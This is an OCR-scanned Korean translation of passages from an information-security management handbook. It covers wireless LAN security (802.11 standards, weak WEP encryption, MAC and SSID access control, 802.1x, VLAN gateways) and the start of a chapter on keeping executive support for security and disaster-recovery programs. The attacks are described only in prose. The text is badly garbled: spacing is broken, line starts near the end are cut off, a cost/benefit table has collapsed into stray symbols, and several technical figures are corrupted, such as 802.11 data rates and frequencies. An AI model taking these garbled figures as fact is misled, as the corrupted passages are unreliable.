오늘 원격접 근 VPN 은 표준으로 되 고 있으며 5,000단위 의 접 속을 동시 에 지 원하는 
능력은 일반제품에서 흔히 보게 된다. 그러나 기성의 망하부구조들을 대신하는 VPN 정보 
통신은 언제 나 큰 호평만을 받은것 은 아니 다. 

VPN 들은《안전원격접근》해결책으로 인정되였고 따라서 공공망을 통한 가상접속의 
가치 는 앞으로 충분히 탐구해 야 할 문제 로 된다. 최 종설계 에 서 기 본개 념 들이 리해 되 고 
접 수되 고 발전되 는 한 가능한 모든 기 능들을 리용하는것 은 분명 능력 에 달려 있 다고 보 
아야 할것이다. 
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제 1 6장. 무선국부망보안 


맨디 안드레스 

무선국부망들은 이동성을 보장한다 . 회의장에 무릎형콤퓨터를 휴대하고 들어 가고 
싶어 하지 않는 사람이 어데 있겠으며 또 망케블에 대한 걱정도 없이 완전한 망접근을 
가지고 싶어 하지 않을 사람이 어데 있겠는가. 제작회사들은 지어 무선 LAN(WLAN) 을 리 
용하여 지금까지 망에 케블을 쓰는 방법으로는 접근할수 없는 작업현장의 기계들을 감시 
하고 있다. 이동성과 접근성 이 높아 져 통신은 개선되고 생산능률과 효과성 이 높아 졌다. 

무선 LAN 은 또한 비용에서도 혜 택을 주게 된다. 9유선통신을 설치 하고 구성하는데는 
비용이 많이 든다. 특히 산간오지 같은 곳에서는 더욱 그렇다. 모든 구성요소들을 제대로 
설 치 하고 련결시키 자면 흔히 사다리，보조천정，무거 운 가구，무릎받치 개 들과 많은 시 간이 
필요하게 된다. 그러나 이와는 반대로 무선 LAN 을 설치하기는 쉬운것 이 다. 접근점을 접속 
하고 무선 NIC 를 설 치하면 망설치 는 다 끝난다. 접 근점 은 무선장치 들에 대 하여 관문작용을 
하는 장치 이 다. 이 관문을 통하여 무선장치들은 망에 접근한다(그림 16 — 1을 보라). 



기동성과 비용의 효과성이 높아짐에 따라 무선 LAN 들은 대중화되고 있다. Gartner 
Group 의 추산에 의하면 무선 LAN 수입 액 은 20()1 년에 총 4억 8천 7백 만딸라에 달하며 설 치 
된 무선 LAN 의 총액은 2004년이면 358억 딸라로 증가될 것 이 라고 한다. 무선 LAN 시장은 다음 
몇해 동안 해 마다 25%씩 늘어 나게 되 여 2000년에 는 7억 7천 백 만딸라였는데 2004년에 22 
억 딸라로 늘어 날것 이 라고 Cahner In-Stat Group 은 예 언 하였 다. 우의 두 예 측은 크게 차이 나 
지만 한가지 공통점을 시사한다. 즉 많은 새 무선 LAN 이 전개될것이며 지금 설치되여 있는 
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것들은 확장될것이라는것이다. 이렇게 증가될수 있다고 보는것은 속도가 증가하고 가격이 
인하되였으며 업계의 광범한 지원속에 공식표준이 지난 해에 채택되였기때문이다. 

표 준 


무선 LAN 에 대 한 보안문제 를 론의하기전에 통신의 기 초로 되 는 표준에 대 한 론의 가 
중요하다. 1997 년 6 월 IEEE (전기 및 전자공학자협 회 )는 무선 LAN 들의 초기 표준을 
IEEE802.il 로 결정하였 다. 이 표준은 1 과 2Mbps 의 자료속도를 가진 2.4GHz 동작주파수를 
규정하며 주파수도약 및 직 접렬을 리용하여 확산스펙 트르변조의 두 비 호환성 형 식 들가운 
데 서 하나를 선택하는 능력 을 규정한다. 1999 년 후반기 에 IEEE 는 초기 802.11 표준에 두 
보충표준 즉 802.11a 와 802.11b 를 발표하였다. 

802.11b 는 초기표준처럼 2.4GHz 대역에서 동작한다. 그러나 자료속도는 1Mbps 만큼 높 
을수 있으며 오직 직접렬변조만이 결정된다. 802.11a 표준은 5.4Mbps 까지의 자료속도를 가 
진 OFDM (직 교주파수분할다중화)를 리용하여 5-9Hz 대 역 에서 동작을 결정한다. 이 표준의 
우점들은 능력이 보다 높고 다른 형태의 장치들에 대한 RF 간섭이 적은것이다. 802.11a 표 
준은 있지 만 현재 시 장에 는 제 품들이 없 다. 그런 제 품들은 20()1 년 4/4 분기 부터 구입할수 
있게 된다. 802.11a 와 802.11b 표준들은 다른 주파수들에서 작용한다. 그리 하여 그것들이 
호상작용할수 있는 기회는 거의 없는것이다. 그러나 신호중첩이 없으므로 그것들은 한 
망에서 공존할수 있다. 일부 판매자들은 앞으로 802.11a 와 802.lib 를 갖춘 2 중무선체계를 
제공하게 될것 이 라고 한다. 

유럽은 유럽원격통신표준연구소 (ETSI) 의 주관하에 ffiperLAN/2 표준을 개발하여 문제를 
복잡하게 만들었다. ffiperLAN/2 와 802.11a 는 일부 류사성을 가진다. 두 표준은 OFDM 기술 
을 리용하여 5GHz 범위에서 자기 속도를 얻게 된다. 그러나 그것들에는 운용호환성이 없다. 

이 장의 마지막부분에 가서 802.1 lb 무선 LAN 에 대하여 집중적으로 토론하게 되는데 
그것들이 현재 설치된 기지를 포함하고 있기때문이다. 

보안 문 제 


무선 LAN 은 중요한 보안문제 들을 안고 있 다. 기 정구성，망구성 방식，암호화약점 및 
물리 적보안은 다 무선 LAN 설 치 를 위한 문제 들을 초래하는 지 역 들이 다. 

기정 설치 

이미 설치된 대부분의 무선망들은 임의의 무선 NIC 가 어떤 형태의 인증도 없이 그 
망에 접근할수 있도록 한다. 누구나 휴대형콤퓨터를 손에 들고 쉽게 다니면서 많은 망접 
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속을 할수 있 다. 무선 LAN 관리 자들은 라지 오파가 케 블보다 은밀 히 도청하기 가 더 쉽 다는 
것 을 리해할수도 있 다. 그러 나 그들은 라지오파가 정 말 얼 마나 취 약한가 하는것 을 리해 
하지 못할수도 있다. 

무선 ISP 들은 그 무선망구성들에 대하여 잘 알아야 한다. 누군가 인증도 없이 그들의 
망에 접근할수 있다면 그것은 본질상 봉사를 훔치고 있는것이다. 무선 ISP 는 소득을 엄지 
못하고 있으며 비법적인 사용자는 가치 있는 대역너비를 잡고 있는것이다. 

사용자가 비 법적 이든 합법 적 이든 관계 없이 무선망에 접근하는 경우 봉사기 나 응용프 
로그람에 접근하지 못하게 하는 유일한 방도는 내적 인 보안통제이 다. 이런 통제가 약하 
거 나 없으면 비 법사용자가 무선 LAN 을 통하여 어 떤 망에 쉽 게 접 근하고 다음에 는 내 적 
인 약점 을 깡그리 리용하여 그 망을 완전히 장악할수 있 다. 

봉사거절공격은 또한 무선망에 대한 아주 실제적인 위협으로 된다. 무선망에서 임 
무가 매우 중요한 체계가 운영되는 경우 파괴나 기관에 재정적손실을 줄 목적이 있다 
면 그 체계에 접근할 필요가 없다. 공격자들은 위조무선전송을 망에 범람시키기만 하 
면 된다. 


위 험 완 화 


기 업과 생 산환경 에 무선 LAN 들을 리용하기 위 해서 는 오늘의 제 품과 표준에서 본 
래의 위험을 줄여야 한다. 기업수준의 무선 LAN 보안에서는 두가지 기본 문제가 제기 
된 다. 다시 말하여 합법 적사용자만이 망에 접 근해 야 하며 무선통화를 도청할수 없게 
해야 한다. 802. lib 표준에는 일부 보안장치들이 포함되여 있지만 그 규모조절성은 확 
실치 않다. 


매체접근조종 ( MAC ) 주소 


무선망에 대한 접근을 안전하게 하는 한가지 방법은 알려 진 주소들에서 출발하는 
파케트들만 접근점들이 통과시키도록 지령을 주는것이다. 물론 공격자들이 MAC (매체접 
근조종: Media Access Con 仕 ol ) 주소들을 위장할수도 있 다. 그러 나 공격 자는 합법적 사용자 
의 이씨네 트카드의 주소를 알아야 성 공할수 있다. 그런데 많은 무선카드들은 그 표면에 
MAC 주소들이 찍혀 있는것이다. 

사용자와 관리 자가 카드주소를 안전하게 할수 있다 하더 라도 또한 그들은 매 접근점 
에 대 한 유효한 MAC 주소목록을 작성 하고 유지 하며 분배하여 야 한다. 이 런 보안방법 은 
비행장，호텔 및 회의장에서 쓰이는 많은 대중 WLAN 응용에서는 가능성이 없다. 그것은 
그 응용들이 그 사용자공동체를 사전에 알지 못하기때문이다. 또한 접근점은 허락되는 
주소번호에서 일련의 제한이 있다. 
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봉사모임식별자 


접근제한에 리용될수 있는 접근점에 대하여 설정해야 하는 다른 하나의 문제는 
SSID (봉사모임식 별자)로 알려 진 망이름이 다. 한 접 근점 을 구성하여 의뢰기 가 그에 접속 
하게 하거 나 의뢰기 가 특별히 그 접근점 을 이름으로 요구하게 할수 있다. 이것 이 주로 
보안특성 을 의 미 하지 는 않지 만 접 근점 을 설 정하여 SSID 를 요구하는것 은 ID 로 하여 금 그 
룹공동통과암호로 될수 있게 한다. 

그러 나 통과암호방식 에서처 럼 더 많은 사람들이 통과암호를 알면 알수록 비 법 사용자 
가 람용할수 있는 가능성은 그만큼 더 커진다. SSID 는 주기적으로 변할수 있으나 매 사 
용자는 새 토운 正)에 대 하여 통보를 받고 무선 NIC 를 다시 구성 하여 야 한다. 


유선등가사적 비밀보호 ( WEP ) 


802.11b 표준은 의 뢰기들과 접근점들사이의 암호화된 통신을 WEP 를 통하여 보장한다. 
WEP 하에서 주어 진 접근점사용자들은 종종 갈은 암호화열쇠를 공유한다. 구내에서 이동 
성 을 위 하여 모든 접 근점 들은 동일 한 건을 리 용하도록 설 정 되 여 야 하며 모든 의 뢰 기 들은 
또한 동일한 암호화열쇠를 소유하여야 한다. 또한 자료머리부는 해신되여 누구든지 자료 
전송의 원천과 목적지를 알수 있게 된다. 

WEP 는 40bit RC4 로부터 128bit RC4 를 리 용하는 약한 규약이 다. 그것 은 계 산상 효 
과，자체 동기 화 및 전송을 위한것이 였 다. 이 런 특성 들은 WEP 를 마비 시 키 는 특성 들이 
다. WEP 에 쉽 게 가할수 있는 몇 가지 공격 들을 아래 에 제 시한다. 

• 통계 적분석 에 기 초하여 전송흐름을 복호화하는 피 동적공격 

• 알려 진 평문에 기 초하여 비 법 이 동국들로부터 오는 새 로운 전송흐름을 주입하는 
능동적 공격 

• 약 하루분량의 전송흐름을 분석한후에 모든 전송흐름의 실시간자동복호화를 하 
게 하는 사전구축공격 

대부분의 판매업체들은 WEP 가 있거나 없는 모형들을 제공하지만 일부 판매업체들 
은 우의 제 한성 들로 하여 WEP 를 실 행하지 않는다. WEP 를 전혀 리용하지 않거 나 WEP 
의 리용을 항상 요구하도록 접 근점 을 구성할수 있 다. WEP 를 항상 리용하게 끔 접 근점 을 
구성하는 경우에 의뢰기에는 암호화비용이 보내여 지게 된다. 의뢰기 가 정 확하게 응답할 
수 없으면 접 근점리 용이 허 락되 지 않게 되 여 WEP 열쇠 가 또하나의 통과암호로 된다. 
SSID 를 통과암호로 리용하는 경 우와 같이 관리 자는 WEP 열 쇠 를 흔히 하는 방법 대 로 바 
물수 있다. 그러나 같은 의뢰기이므로 통보 및 구성이 문제로 될것이다. 

물론 WEP 열 쇠 를 가지 고 있는 공격 자는 무선전파로부터 파케 트들을 엿 보기하여 복 
호화할수 있다. 
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인증해결책 


일부 판매업체들은 인증 또는 범위성문제에 특허적해결책을 제공한다. 무선의뢰기는 
접근점으로부터 인증을 요구하며 접근점은 RADIUS 봉사기에 그 요구를 보낸다. 인증을 
받으면 RADIUS 봉사기 는 진행 중의 대 화에 대 한 유일한 암호화열쇠 를 접 근점 에 보낸다. 
접 근점은 그것을 의뢰기 에 전송한다. 이 표준은 공유된 열쇠문제의 해 결책 을 제공하는 
한편 흔히 그 해 결책은 해 당 기 관이 한 판매자로부터 모든 설비를 구입할것을 요구한다. 
다른 판매 자들은 공동열 쇠암호기 법 을 사용하여 매 대 화당 열 쇠 들을 생 성한다. 

이 인증해 결책 은 802.1x 잠정표준안을 실행하는것 과 류사하다. 이 잠정 안이 실현되 면 
판매업체호상간 호환성해결방법으로 이 문제는 결국 풀릴것이다. 802.1x 표준은 802 기술전 
체 를 위한 일 반목적 접 근조종방식 으로 개 발되 고 있 다. 인증방식 은 RADIUS 의 확장가능인 
증규약 (EAP) 에 기초하고 있다. EAP 는 의뢰기로 하여금 인증봉사기와 인증규약을 교섭하 
게 한다. 또한 802.1x 표준은 접 속암호화열쇠 가 변경되 도록 허 용한다. 이 표준은 빨라서 
2002 년에 무선제품들에서 나타날수 있을것이다. 관리자는 802.1x 를 기다리는 한편 무선 
LAN 의 보안성 을 높이 기 위하여 취 할수 있는 몇 가지 다른 방도들도 가지 고 있 어 야 한다. 

제 3 자제품 


무선 LAN 들의 보안을 보장하는데는 여러가지 제품들이 있다. 실례로 WRQ 회사의 
NetMotion(www.netmotionwireless.com) 은 Windows NT 를 통하여 인증되는 사용자가입을 요 
구한다. 이 회사는 WEP 보다 더 좋은 암호화 (3DES 와 Twofish) 를 사용하며 무선망카트접 
속을 원격으로 사용중지시킬수 있는 능력을 제공한다. 이 해결책과 관련한 중요한 문제 
의 하나는 봉사기 는 흔히 Windows NT 에서 운영 되 여 야 하며 의 뢰기지원은 오직 Windows 
95, 98, ME/CE 에 제공되여야 한다는것이다. Windows 2000 봉사기와 의뢰기에 대한 지원 
은 지금 개발중에 있다. 


관문 조종 


관문해 결 책은 무선통화를 위한 특별부분망을 창조한다. 이 부분망들은 정 상경 로기 들 
을 리용하지 않고 관문을 가지 고 거 기 에서 인증을 받은 다음에 야 파케 트들에 경 로를 조 
정 해 준다. 부분망들은 IEEE 802.1Q 표준을 리 용하는 VLAN 기 술에 의 하여 창조될 수 있 다. 
이 런 표준에 따라 관리 자들은 각이한 교환기 에 서 선택포구들을 묶어 하나의 부분망으로 
결합시 킬수 있다. 교환기들이 지 리적으로 떨어 져 있다고 하더 라도 VLAN 중계 가 간섭교 
환기 들에 서 지 원되 는 한 이 런 결 합은 가능하다. VLAN 포구들을 리용하는 마디 들은 그 다 
른 부분망들이 VLAN 포구인 동일 한 물리 적교환기 에 놓인다 하더 라도 경 로기 나 관문을 
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지남이 없이는 다른 부분망들에 있는 주소들에 접근할수 없다. 

VLAN 이 이루어 지면 관리자들은 오직 승인된 사용자들로부터 오는 전송흐름만을 
통과시키 는 관문을 창조할 필 요가 있 다. VPN 봉사기 의 기 능이 끝점 을 요구하는것 이 기 때 
문에 VPN 관문을 리용할수 있 다. VPN 봉사기 를 관문으로 리 용하는것 은 런넬끝점 의 인증 
을 요구할뿐아니 라 런넬에 유일한 건으로 무선흐름을 암호화하여 WEP 의 공유된 건을 
사용할 필요를 없앤다. 

그러 나 VPN 방법 은 리상적 이 못된다. VPN 의 리해， VPN 관문의 선택，봉사기 의 구성 
과 의뢰기의 지 원은 일반 LAN 관리 자가 수행 하기 어 려운 복잡한 과업 들이다. 

현재 Georgia Tech 가 리 용하고 있는 또하나의 해 결책 은 특수한 방화벽 관문을 리 용하 
는것 이 다. 이 방법 은 VLAN 을 리용하여 하나의 관문에 로 무선전송흐름을 집 합하는 방법 
이 다. 그러 나 이 관문은 VPN 이 아니 라 특수화된 코드를 실 행하는 이 중홈 UNIX 봉사기 이 
다. Georgia Tech 의 IT 관계 자들은 최 근의 Linux 핵 심 부에 서 IP 표방화벽 기 능을 리 용하여 파 
케트려과를 보장한다. 접근을 허락하기 위하여 의뢰기는 Web 열람기를 열어야 한다. 의뢰 
기의 HTTP 요구에 따라 관문으로부터 자동방향변경인증폐지가 열리고 인증요구에 따라 
Kerberos 봉사기 에 보내 진다. 인증이 성 과적 이 면 PERL 대 본은 규칙 파일 에 IP 주소를 추가하 
여 그것 을 IP 표방화벽공정 에 대 한《 알려 진》주소로 되 게 한다. 

사용자의 관점에서 보면 그들은 열람기를 시동하고 사용자식별기호와 통과암호를 
주입하여 망에 접 근해 야 한다. 의뢰기설치 나 인증은 요구되지 않는다. 물론 이 방법 은 
암호화가 아니 라 오직 인증만 보장하므로 수백명 이상의 동시 사용자들에 대 해서 는 규 
모조절을 하지 못할것 이 다. 이 해결책은 의뢰기 에 그 어떤 변화도 주지 않으면서 완 
전한 작동중 망접근을 허용한다는 점에서는 유일하고 훌륭한것 이므로 많은 판매 업체의 
망기관들을 지원한다. 이 구성은 공통 VLAN 응용(비행장，호텔，토론회 등)에 매우 쓸 
모 있다. 

결 론 

무선 LAN 에는 몇가지 보안상 문제점들이 있어 매우 민감한 망에는 쓸수 없게 되 
여 있다. 빈약한 하부구조설계，승인되지 않은 사용，도청，가로채기， DoS 공격，의뢰기 
체계도난은 모두 분석고찰해야 할 분야들이다. 통신을 VPN 으로 둘러 싸거나 창조적 
인 해결책을 개발하면 이런 위험들을 완화시킬수 있다. 그러나 이것은 복잡할수 있다. 
WEP 표준의 변화와 무선기 술의 새 로운 발전은 리용성 은 물론 보안성 도 개 선할수 있을 
것 이 다. 
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제 3 편 

보안관리 실천 


정보체계보안에서 큰 전진이 계속 이루어 지고 있음에도 불구하고 보안관리자들은 
다음과 같은것을 계속적인 도전으로 인정하고 있다. 즉 

• 조작체 계，자료기지，응용프로그람 및 인터 네트조작기술에서 증가되는 취 약성 

• 상부로부터의 불충분한 지원 

• 주 및 련방의무조항의 증대 

• 보안투자자금의 결핍 

• 사용자의 의식과 책임관계의 결핍 

• 효과적 인 보안람색가능성의 부족 

• 보안이 기업의 창발성의 성과를 담보할수 있다는것을 종종 보여 줄수 없는것 

이 편의 여러 장에서는 변화관리，방책개발，위험평가 및 관리，사용자교육 및 의식 
화와 갈은 원리들을 취 급한다. 

17장에 서 William Tompkins 는 보안과 기 업 과정 을 시 종일 관하게 일 치 시 키 는것 이 가지 
는 중요성을 상기시키고 있다. 기업사용자들은 자기들의 체계나 응용프로그람이 그들의 
요구를 만족시키 지 못한다는것 을 뒤 늦게 알고서 는 실망한다. 훌륭한 보안관리자는 기 업 
동업 자와의 초기토의 에 참가하는것，기 업 요구를 수집하는것，다음에 는 그것 을 보안요구에 
로 전환시키 는것 의 중요성 을 인식 하고 평 가한다. 기 업 사용자들은 기 능성 요구를 보장할수 
있다. 그렇지만 보안관리자의 임무는 접근조종의 수집，부호화，시험 및 실현과 사용자식 
별，인증，검열통제 등이다. 

이 편에서는 정보재산보호에 관한 방책에 따라 보안프로그람의 기초를 쌓는것이 가 
지는 중요성에 대하여 언급한다. 특히 몇개 장은 위험이란 무엇이며 위험을 어떻게 처리 
하여 정보체계에서 요구되는 신용과 보험을 개발하겠는가 하는것을 취급한다. 

기관의 사용자들은 정보담보의 획득과 관리의 주요구성부분으로 된다. 보안관리자가 
기 업 규모의 계속되는 효과적 인 보안의 식화깜빠니야를 벌 리지 않는다면 가장 훌륭한 정 보 
보안방책은 은을 내지 못할것 이다. 양성전문가들은 잘 작성된 프로그람은 근본적 인 문제 
들을 고려해 야 한다고 한다. 그런 중요한 문제 들에 는 양성대 상의 구성，청 강자들이 정 보 
를 접수하는 방법 그리고 어떻게 그들로 하여금 배운 지식을 기억하고 적용하게 하겠는 
가 하는 문제들이 속한다. 이 편에서는 가장 우수한 의식화과정의 작용에 대하여 언급하 
게 된다. 

구성관리는 보안실행에서 일관성，완벽성과 엄밀성을 지원한다. 이 편에서 토론하게 
되 는 구성관리 는 도입 되 고 있는 기 술，처 리，실 천과의 비 교속에서 기 관의 현재보안자세 를 
결정하는 방법 을 보장하며 보안자세 에 대 한 변화의 영 향을 평 가한다. 
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제 1 7장. 경영진의 공약유지 


월리암 름킨스 

정보보안，재해복구 및 비상대책실행자들은 자기들의 제출안을 계획화하여 현실에 
도입한 성공의 기쁨을 느끼게 되면 인차 또하나의 더 힘든 문제 즉 자기 기관의 계획을 
지속적으로 《혈기왕성하여》추진시켜야 하는 어려운 과업을 수행하지 않으면 안된다. 
더 정확히 말하여 그들은 기업의 지속적운영과 정보보안을 계속 활성화하고 효과성을 높 
이기 위하여 애쓰고 있는것이다. 

많은 경우 힘든것은 경영진으로부터 초기투자획득을 이끌어 내는것이다. 그러나 이 
《학과과정(《경영진의 투자획득 제1장》도 볼수 있다.)을 통과》하면 보다 더 힘든 장기적 
인 과제 즉 경영진의 공약을 유지시키는것이 과제로 나선다. 이 《학과과정)을《경영진의 
투자획득 제2장)이라고 부를수 있다. 이 장에서는 초기투자획득이후에는 무엇을 해 야 하는 
가 하는 문제를 다루지만 초기투자획득의 일부 원리들에 대해서도 폭넓게 다루려고 한다. 

이 장에서는 또한 경영진이 관심을 가지고 관리에 참가하도록 하며 경영진의 구입과 승 
인에 대하여 모든 직원들이 다 알도록 하는 방도들에 대하여 언급한다. 이 프로그람들의 끊 
임 없는 성공을 위한 중요한 요구의 하나는 관리에 대하여 잘 알고 공약화하도록 하는것이 다. 
경영진이 프로그람을 잘 지원하지 않는다면 다시 말하여 경영진이 프로그람에 대한 지원이 
중요하지 않다고 생각하는 경우에는 다른 종업원들이 그 사업에 참가하지 않게 될것 이 다. 


《최근에 당신들은 나를 위해서 무엇들 하였소?》 


지금까지 몇명의 실행 자들은 그들의 경 영 자들로부터 이 런 말을 듣기는 하였지 만 대 
부분의 실행자들은 이런 말을 경영자들에게서 듣지 못하였다. 그러나 많은 경우에 많은 
경영자들은 이런 프로그람을 하나의 개발계획으로만 생각하는것은 사실이다. 즉 경영자 
는《이 개발계획이 완성되면 나는 다른 더 중요한 개발계획을 해야겠다.》고 생각한다. 
이렇게 놓고 보면 정보보안 및 재해복구계획자들은 언제나 마음이 편안치 못하다. 실행자 
들이 계속 강조해야 할 중요한 조항은 목표인것이 아니라 려행 이라는것이다. 

이 런 려행은 무엇을 포함하는가. 이 장에서는 아래의 4개 항목들에 주목한다. 

• 의견교환 우리가 어떤 의견을 교환하려고 애쓰고 있는가. 우리는 누구와 의견교 
환을 하고 있는가. 우리는 그들이 어떤것을 들었으면 하는가. 

• 만나기 실행자는 언제 나 경영자들과 만나게 될것 이 다. 그러니 우리가 만나는 각 
이 한 수준의 경 영 자측에 무엇을 말해 야 하는가. 

• 교육 경영자를 포함하여 모든 사람들에 대한 교육은 계속되는 공정이다. 경영자 
가 배워 야 할 정보는 어느정도인가. 

• 고무 경 영 자를 고무격 려 하고 그들을 계 속 지 원 하려 면 어 떻 게 해 야 하는가 
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경영자와 대화하기가 왜 어려운가. 《경영자는 실행자가 요구하는것을 리해하지 못 
한다.》，《경영자는 오직 비용에 대하여 근심할뿐이다.》다시 말하여 《경영자는 의견을 
들으려 하지 않는다.》이런 생각들은 실행자들에게 익숙해 진 생각이다. 전달내용은 경영 
자의 마음에 그대로 새겨 져야 한다. 그러나 여기서 중요한 문제들은 다음과 같은것들이 
다. (1) 실행자들은 현실에 발맞추어야 한다. (2) 실행자들은 경영자들이 기업에 대하여 
리해할수 있도륵 말해 야 한다. (3) 실행 자들은 비 용절 약안들을 생 각해 내 야 한다(이 안자 
체 가 일정한 일을 필요로 할수도 있 다.). 

가정과 현실 

의견교환해야 할것과 의견교환하지 말아야 할것은 무엇인가. 둘다 중요하다. 그러나 
보안과 기 업련속운영 에 서 가정 을 피 하는것 은 사활적 이 다. 관리 와 보안/ BCP (기 업련속계 
획)실행자들이 부정확한 가정의 후과로부터 손실을 당하는 실례는 많이 찾아 볼수 있다. 

재 해 복구계 획 분야에 서 는 상급경 영 자가 기 관의 실제 적 인 회 복능력 을 알도록 하는것 이 
무엇보다도 중요한것이다. 경영진은 기관에서 재해가 일어 나는 경우 현실적으로 복구가 
최소한 며칠이 걸림에도 불구하고 몇시간내에 인차 회복할수 있을것이 라고 쉽게 가정할 
수 있 다. 현실적 으로는 기 관의 각 부서 들이 기 관전반의 재 해 복구를 념두에 두지 않고 오 
직 부서 의 자그마한 망설 비 와 부분망설 비 만 구입하여 설 치하지 만 경 영 진은 이 각 부서 들 
이 재해복구조정관의 주관하에 서로 협동을 잘해 가면서 재해복구계획을 잘 집행하고 있 
다고 가정하는것이다. 또한 재해의 심각성이 얼마나 큰가에는 상관없이 모든 정보가 재 
난이 일어 나기전 시간의것으로 환원복구될수 있다고 생각하지만 현실적으로는 그 전날 
밤의 예비본까지로밖에 복구할수 없으며 더우기는 며칠전의 수준으로도 될수 있는것이다. 

이렇게 되면 가정을 잘못한 후과가 오게 된다. 2000년 3월 어느 한 보안대회에서 
Global Integrity 회사의 유진 술쯔박사는 어느 한 유명 한 정보보안전문가에 대 한 이 야기를 
하였다. 이 전문가가 상당히 훌륭한 보안계획을 가지고 있다고 생각하였는데 사실인즉 
이 전문가가 회 사의 기 업과정 에 대 한 실상을 잘 파악하지 못하고 그 계 획을 작성하다보 
니 자기 네 회사의 상급경 영 진은 그 보안계 획 에 실망을 느끼 고 말았다는것이 였다. 이 렇게 
실망하게 되면 경영진이 그 계획에 대한 투자가로서의 지위를 잃게 될수도 있고 예산상 
지원도 받지 못할수도 있으며 잘되는 경우에도 경영진이 그 계획개발과정에 자기들이 참 
가하지 말아야 되겠다고 생각하게 되는 정도까지 그 후과가 이르게 될것 이 다. 

각이한 관리수준에는 각이한 방법들 

어 느 기 관이 든지 실 행 자가 어 느 기 관과 의 견교환을 해 야 하는가에 따라 주의할 문제 
가 결정 되 며 토론할 문제 는 반드시 경 영 자가 리해할수 있는 말로 이 야기 되 여 야 한다. 기 
술적 인 술어 로 마구 말하지 말아야 한다. 다시 말하여 그들이 기 억할수도 없는것 그리 고 
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알려고도 하지 않는것을 가르치 러고 하지 말아야 한다. 

이야기분야에서 리해력을 높이기 위하여 실행자가 사용하는 참고서는 경영자들이 쓰 
소로 즉 경영자들이 알아 들을수 있는 말로 해석해 주어야 한다. 가능하면 원가상 리 
요 원가회피방책들과 기관의 계획작성 및 계획관리의 한 부분으로 될수 있는 기업성 
인들과 갈은 기 본기 업 방책 들에 의 거 하라. 비 상대 책 계 획 화봉사 혹은 정 보보안자문이 
의 업무가 아닌 경우 회 사가 BCP 혹은 InfoSec 로부터 어 떻게 수입 리득금을 엄 을수 
는가 하는것을 보여 주기 어렵게 된다. 그러나 얻게 될 리익에 대하여 그리고 BCP 
ifoSec 가 시 작부터 MIS 계 획 작성 에 포함되는 경우에 피할수 있는 엄청난 비 용에 대 하 
3•상 토론할 준비가 되여야 한다. 


표 17-1 원가상리득과 원가상회피 



BCP 

Inf Sec 계 획 

편의 



기관에 대한 보호 

貧，， 1 

公 

회사의 명성유지 

效 


리용성의 담보 

浴 


부주의로 인한 보안위반의 최소화 


公 

고의적보안침해에 대처한 노력의 최대화 


■# 

취소 



계획에 없던 복구원가의 증대 

分 


이 미 완성 된 응용 또는 체 계 에 InfoSec (또는 BCP) 를 

추가하기 위한 총계획비용의 4배(혹은 그이상)증가 

公 

•0 

기업을 그만두는 경우에 드는 비용…? 

\ _ 起- ' 

___ ▲ __ 


표 17 — 1은 대 부분의 회 사들이 인정할수 있는 원 가상 리 득과 원가회 피 (투자후 효과 
1하여)의 간단한 몇가지 실례들이다. 

실행자들은 … 기업들 살리는 사람들인가 


기 관은《 전형 적 인》회 복태세 를 갖추지 못하고 있 다. 즉 정 보기 술회 복계 획 은 작성 되 
1업 공정 회 복은 계 획 화되 지 않는다. IT 계 획 에 대 한 요구가 어 떻 든지간에 실 행 자는 집 
쓸모 있는 성 원으로 인정 받기 위하여 그리 고 의의 있는 요인들(기 업공정들이 계속 
되 여 나갈수 있게 하는)이 계 획의 초기개 발단계 에서 고려 되도록 하기 위하여 계속 
하여 야 한다. 실행 자들이 경 영 자의 가정 에 의 거하지 않으며 회 복(있을수 있는 최 대 
지 속시 간)，체 계실패탐색，가동기 간담보(내 적 및 외 적 )，성 능지 표 및 봉사수준가격모 



주동자로 인정될것이다. 

오늘의 기업세계에서 거의 모든 기업들이 인터네트에 일정하게 의존하게 될것이라는 
것은 일 반적 인 사실 이 다. 기 업 공정 들의 성 과는 회 사가 자동화된 기업 공정을 실 시 간에 얼 
마나 빨리 회복시키거나 복구하는가에 크게 의존된다는것을 알려 주는것은 사활적인 요 
구로 되였다. 이런것을 성과적으로 통보할 때 그 기관의 손실들과 동업자들이 그 회사에 
서 보장하는 안전수준을 높이게 된다. 그것은 안전수준이 회사가 얼마나 효과적으로 망 
으로 련결된 기업공정을 조종하는가 하는것을 보여 주기때문이다. 

《 새 로운》체 계 개 발에 일찌 기 인 입되 여 야 한다. 기 업 공정 의 초기 개 발단계 들에 서 고 
려 되는 정보보안 및 사고방지 계획을 위 한 방책 적 요구를 세 우기 위 하여 필요한 대책을 세 
우는것 은 절 박한 문제 이 다. 이것 들은 보충비 용이 아니 라 하부구조비 용의 일부라는것 을 
강조하여 주어 야 한다. 

IT 관점에서 출발하여 새로운 기입공정개발을 추동하려는 현 추세를 따르지 말고 새 
로운 기 업 공정 에 기 초하여 IT 보안을 추동해 야 한다. 즉 자동화된 기 업공정 들이 기 업 상 요 
구에 기초하여 그 구조가 형성되여야 한다. 

해당한 사람들들 만나라 

언급된바와 같이 회사의 조직체계에서 실행자가 어느 자리를 차지하고 있는가에 따 
라 누구와 함께 일을 시작할것인가 하는것이 결정되게 될것이다. 그러나 우선 (1) 기업을 
알아야 하며 (2) 경 영 자가 무엇 을 바라는가를 알아야 하며 또한 (3) 기 술적요구사항들을 
알아야 한다. 실행 자들은 행정 관리 가 어 떻게 《움직 이는》가에 대 하여 미 리 알아야 한다. 
그렇지 않고 설계단계에서 틀림없이 사멸될 안을 밀고 나가려고 한다면 아마도 그것은 
소득보다 오히려 손실을 더 당하게 할것이다(표 17_2를 볼것). 

표 17-2 소개모임 


새로운 기관에서 사업을 시 작하면서 내가，씨 맡은 가장 중요한 과업의 하나는 될수록 
많은 경영자들과 일대 일로 만나게 되는《소개모임》을 시간표화하는것이다. 이 모임을 설정하 
게 된 목적은 기업을 알자는것이다. 나의 역할을 토론하자는것이 아니라는것을 모든 경영자들에 
게 말해 준다. 그것은 나의 역할이 아직 형성단계에 있기때문이다. 나의 역할을 수행하기 위하여 
그 부서의 기업공정에 대하여 내가 알 필요가 있다는것을 미 리 그들에게 말해 둔다. 내가 기업 
공정을 배우는데 정말 흥미를 가지지만 그 부서의 IT 사용에 대해서는 그닥 흥미를 가지지 않는 
다는것을 그들에게 인식시 켜 야 한다. 다음으로 나는 그들에게 기 관에서 어 느 사람을 만나야 그 
기관에 대한 더 완전한 표상을 내가 가질수 있겠는가고 물어 보면서 그런 사람을 소개해 주지 
않겠는가고 부락한다(그다음부터는 그들의 권고에 기초하여 사람들을 만난다.). 마지막으로 가능 
